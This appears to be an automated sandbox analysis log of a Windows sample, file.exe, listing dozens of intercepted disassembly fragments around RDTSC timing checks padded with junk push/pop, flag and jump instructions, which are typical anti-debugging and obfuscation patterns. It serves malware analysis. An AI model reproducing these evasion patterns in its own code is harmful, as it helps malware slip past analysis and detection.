Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20716 second address: 4E20730 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 5C8C6783h 0x00000008 push esi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movsx edi, ax 0x00000014 mov esi, 12A2D7CFh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20730 second address: 4E20736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20736 second address: 4E2073A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2073A second address: 4E20767 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8854FAEB8Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20767 second address: 4E2076D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2076D second address: 4E20773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20773 second address: 4E20777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20777 second address: 4E20795 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20795 second address: 4E20799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2081B second address: 4E20863 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8854FAEB92h 0x00000009 adc si, FBE8h 0x0000000e jmp 00007F8854FAEB8Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 cmp dword ptr [ebp-04h], 00000000h 0x0000001b pushad 0x0000001c jmp 00007F8854FAEB94h 0x00000021 push eax 0x00000022 push edx 0x00000023 movzx esi, di 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20863 second address: 4E20895 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8854FD885Dh 0x00000008 xor cx, B8B6h 0x0000000d jmp 00007F8854FD8861h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov esi, eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20895 second address: 4E2089B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2089B second address: 4E208FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8854FD8860h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007F8854FD885Bh 0x0000000f add cx, C69Eh 0x00000014 jmp 00007F8854FD8869h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d je 00007F8854FD88AEh 0x00000023 pushad 0x00000024 mov ebx, ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F8854FD8866h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20926 second address: 4E2092A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2092A second address: 4E20930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20930 second address: 4E2096A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 7C22C6BEh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, esi 0x0000000d pushad 0x0000000e mov esi, edi 0x00000010 movsx ebx, si 0x00000013 popad 0x00000014 pop esi 0x00000015 jmp 00007F8854FAEB96h 0x0000001a leave 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F8854FAEB8Ah 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2096A second address: 4E2096E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2096E second address: 4E20974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20974 second address: 4E2006E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD885Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 xor ebx, ebx 0x00000015 test al, 01h 0x00000017 jne 00007F8854FD8857h 0x00000019 xor eax, eax 0x0000001b sub esp, 08h 0x0000001e mov dword ptr [esp], 00000000h 0x00000025 mov dword ptr [esp+04h], 00000000h 0x0000002d call 00007F88591500EDh 0x00000032 mov edi, edi 0x00000034 jmp 00007F8854FD8862h 0x00000039 xchg eax, ebp 0x0000003a jmp 00007F8854FD8860h 0x0000003f push eax 0x00000040 jmp 00007F8854FD885Bh 0x00000045 xchg eax, ebp 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F8854FD8864h 0x0000004d jmp 00007F8854FD8865h 0x00000052 popfd 0x00000053 push esi 0x00000054 mov si, di 0x00000057 pop edx 0x00000058 popad 0x00000059 mov ebp, esp 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e pushad 0x0000005f popad 0x00000060 mov eax, edx 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2006E second address: 4E20074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20074 second address: 4E20078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20078 second address: 4E200AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push FFFFFFFEh 0x0000000d jmp 00007F8854FAEB90h 0x00000012 push 10D27CEDh 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E200AF second address: 4E200B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E200B5 second address: 4E200C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FAEB90h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E200C9 second address: 4E20175 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD885Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 65C8215Bh 0x00000012 pushad 0x00000013 push esi 0x00000014 jmp 00007F8854FD885Bh 0x00000019 pop eax 0x0000001a mov bh, D5h 0x0000001c popad 0x0000001d call 00007F8854FD8859h 0x00000022 pushad 0x00000023 mov ecx, 72FF7CCDh 0x00000028 pushfd 0x00000029 jmp 00007F8854FD885Ah 0x0000002e and esi, 3EB809E8h 0x00000034 jmp 00007F8854FD885Bh 0x00000039 popfd 0x0000003a popad 0x0000003b push eax 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007F8854FD885Fh 0x00000043 xor si, 792Eh 0x00000048 jmp 00007F8854FD8869h 0x0000004d popfd 0x0000004e movzx esi, bx 0x00000051 popad 0x00000052 mov eax, dword ptr [esp+04h] 0x00000056 jmp 00007F8854FD885Ah 0x0000005b mov eax, dword ptr [eax] 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F8854FD885Dh 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20175 second address: 4E2017B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2017B second address: 4E201E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 mov cl, B7h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jmp 00007F8854FD8860h 0x00000013 pop eax 0x00000014 jmp 00007F8854FD8860h 0x00000019 mov eax, dword ptr fs:[00000000h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push edi 0x00000023 pop eax 0x00000024 pushfd 0x00000025 jmp 00007F8854FD8869h 0x0000002a sbb ah, FFFFFF86h 0x0000002d jmp 00007F8854FD8861h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E201E5 second address: 4E201EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E201EB second address: 4E201EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E201EF second address: 4E201F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E201F3 second address: 4E2023F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F8854FD8864h 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007F8854FD8860h 0x00000016 sub esp, 18h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F8854FD8867h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2023F second address: 4E20244 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20244 second address: 4E202B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F8854FD8865h 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e pushad 0x0000000f call 00007F8854FD885Ah 0x00000014 mov bl, cl 0x00000016 pop ebx 0x00000017 push ecx 0x00000018 pushfd 0x00000019 jmp 00007F8854FD8863h 0x0000001e add ecx, 23DB518Eh 0x00000024 jmp 00007F8854FD8869h 0x00000029 popfd 0x0000002a pop ecx 0x0000002b popad 0x0000002c mov dword ptr [esp], ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov dl, cl 0x00000034 movsx ebx, cx 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E202B3 second address: 4E202B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E202B9 second address: 4E202BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E202BD second address: 4E2034F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx eax, di 0x0000000d push ebx 0x0000000e mov edx, esi 0x00000010 pop ecx 0x00000011 popad 0x00000012 mov dword ptr [esp], esi 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F8854FAEB91h 0x0000001c sub eax, 45D605D6h 0x00000022 jmp 00007F8854FAEB91h 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F8854FAEB90h 0x0000002e adc esi, 22D243F8h 0x00000034 jmp 00007F8854FAEB8Bh 0x00000039 popfd 0x0000003a popad 0x0000003b xchg eax, edi 0x0000003c jmp 00007F8854FAEB96h 0x00000041 push eax 0x00000042 jmp 00007F8854FAEB8Bh 0x00000047 xchg eax, edi 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b mov si, bx 0x0000004e mov si, dx 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2034F second address: 4E203BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8854FD8866h 0x00000008 mov dx, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [769B4538h] 0x00000013 pushad 0x00000014 call 00007F8854FD885Ah 0x00000019 movzx ecx, dx 0x0000001c pop ebx 0x0000001d pushfd 0x0000001e jmp 00007F8854FD885Ch 0x00000023 sub esi, 25A54248h 0x00000029 jmp 00007F8854FD885Bh 0x0000002e popfd 0x0000002f popad 0x00000030 xor dword ptr [ebp-08h], eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F8854FD8865h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E203BC second address: 4E203CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FAEB8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E203CC second address: 4E2040A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD885Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor eax, ebp 0x0000000d pushad 0x0000000e jmp 00007F8854FD8865h 0x00000013 mov si, 4977h 0x00000017 popad 0x00000018 nop 0x00000019 jmp 00007F8854FD885Ah 0x0000001e push eax 0x0000001f pushad 0x00000020 push edi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2040A second address: 4E20472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007F8854FAEB93h 0x0000000b adc ecx, 2474A4AEh 0x00000011 jmp 00007F8854FAEB99h 0x00000016 popfd 0x00000017 popad 0x00000018 nop 0x00000019 jmp 00007F8854FAEB8Eh 0x0000001e lea eax, dword ptr [ebp-10h] 0x00000021 jmp 00007F8854FAEB90h 0x00000026 mov dword ptr fs:[00000000h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20472 second address: 4E2048F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8869h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10209 second address: 4E10212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 7C0Ch 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10212 second address: 4E10303 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8862h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F8854FD8860h 0x00000010 sub esp, 2Ch 0x00000013 jmp 00007F8854FD8860h 0x00000018 xchg eax, ebx 0x00000019 jmp 00007F8854FD8860h 0x0000001e push eax 0x0000001f jmp 00007F8854FD885Bh 0x00000024 xchg eax, ebx 0x00000025 jmp 00007F8854FD8866h 0x0000002a xchg eax, edi 0x0000002b pushad 0x0000002c push esi 0x0000002d call 00007F8854FD885Dh 0x00000032 pop esi 0x00000033 pop ebx 0x00000034 call 00007F8854FD885Eh 0x00000039 mov ch, 11h 0x0000003b pop edx 0x0000003c popad 0x0000003d push eax 0x0000003e jmp 00007F8854FD885Dh 0x00000043 xchg eax, edi 0x00000044 pushad 0x00000045 pushfd 0x00000046 jmp 00007F8854FD885Ch 0x0000004b adc esi, 737CF0D8h 0x00000051 jmp 00007F8854FD885Bh 0x00000056 popfd 0x00000057 push eax 0x00000058 push edx 0x00000059 pushfd 0x0000005a jmp 00007F8854FD8866h 0x0000005f jmp 00007F8854FD8865h 0x00000064 popfd 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E1031A second address: 4E10320 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10320 second address: 4E1036B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d jmp 00007F8854FD8862h 0x00000012 sub edi, edi 0x00000014 jmp 00007F8854FD8861h 0x00000019 inc ebx 0x0000001a jmp 00007F8854FD885Eh 0x0000001f test al, al 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov bx, FC70h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E1036B second address: 4E1037F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FAEB90h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E1037F second address: 4E10393 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F8854FD8A23h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10393 second address: 4E10397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10397 second address: 4E1039D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10446 second address: 4E10462 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8854FAEB97h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E104AA second address: 4E104AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E104AE second address: 4E104B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E104B4 second address: 4E104E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8864h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F88C6B26816h 0x0000000f pushad 0x00000010 call 00007F8854FD885Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E104E3 second address: 4E104FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 mov di, si 0x00000009 pop ecx 0x0000000a popad 0x0000000b js 00007F8854FAEBECh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E104FA second address: 4E104FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E104FE second address: 4E10504 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10504 second address: 4E10548 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 mov ebx, 5908FC78h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d cmp dword ptr [ebp-14h], edi 0x00000010 jmp 00007F8854FD8867h 0x00000015 jne 00007F88C6B267C6h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F8854FD8865h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10548 second address: 4E1054E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E1054E second address: 4E10552 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10552 second address: 4E105EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c push ebx 0x0000000d mov bx, si 0x00000010 pop eax 0x00000011 mov ah, bh 0x00000013 popad 0x00000014 lea eax, dword ptr [ebp-2Ch] 0x00000017 jmp 00007F8854FAEB94h 0x0000001c xchg eax, esi 0x0000001d jmp 00007F8854FAEB90h 0x00000022 push eax 0x00000023 pushad 0x00000024 mov ax, dx 0x00000027 popad 0x00000028 xchg eax, esi 0x00000029 jmp 00007F8854FAEB8Fh 0x0000002e nop 0x0000002f jmp 00007F8854FAEB96h 0x00000034 push eax 0x00000035 jmp 00007F8854FAEB8Bh 0x0000003a nop 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e pushfd 0x0000003f jmp 00007F8854FAEB92h 0x00000044 adc si, EAB8h 0x00000049 jmp 00007F8854FAEB8Bh 0x0000004e popfd 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E105EF second address: 4E10662 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8854FD8868h 0x00000008 sbb esi, 68112518h 0x0000000e jmp 00007F8854FD885Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 call 00007F8854FD8868h 0x0000001b mov dx, ax 0x0000001e pop eax 0x0000001f popad 0x00000020 push ecx 0x00000021 jmp 00007F8854FD885Ah 0x00000026 mov dword ptr [esp], ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F8854FD8867h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10010 second address: 4E10016 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10016 second address: 4E10041 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F8854FD885Ah 0x0000000b xor si, 4618h 0x00000010 jmp 00007F8854FD885Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10041 second address: 4E10047 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10047 second address: 4E10092 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD885Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8854FD885Ch 0x00000013 add esi, 620D27A8h 0x00000019 jmp 00007F8854FD885Bh 0x0000001e popfd 0x0000001f call 00007F8854FD8868h 0x00000024 pop esi 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10092 second address: 4E100AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FAEB97h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E100AD second address: 4E100D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8854FD8867h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E100D1 second address: 4E100EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E100EE second address: 4E1012D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8861h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F8854FD885Eh 0x00000010 xchg eax, ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8854FD8867h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10AC3 second address: 4E10B04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F8854FAEB8Eh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8854FAEB97h 0x0000001a rdtsc
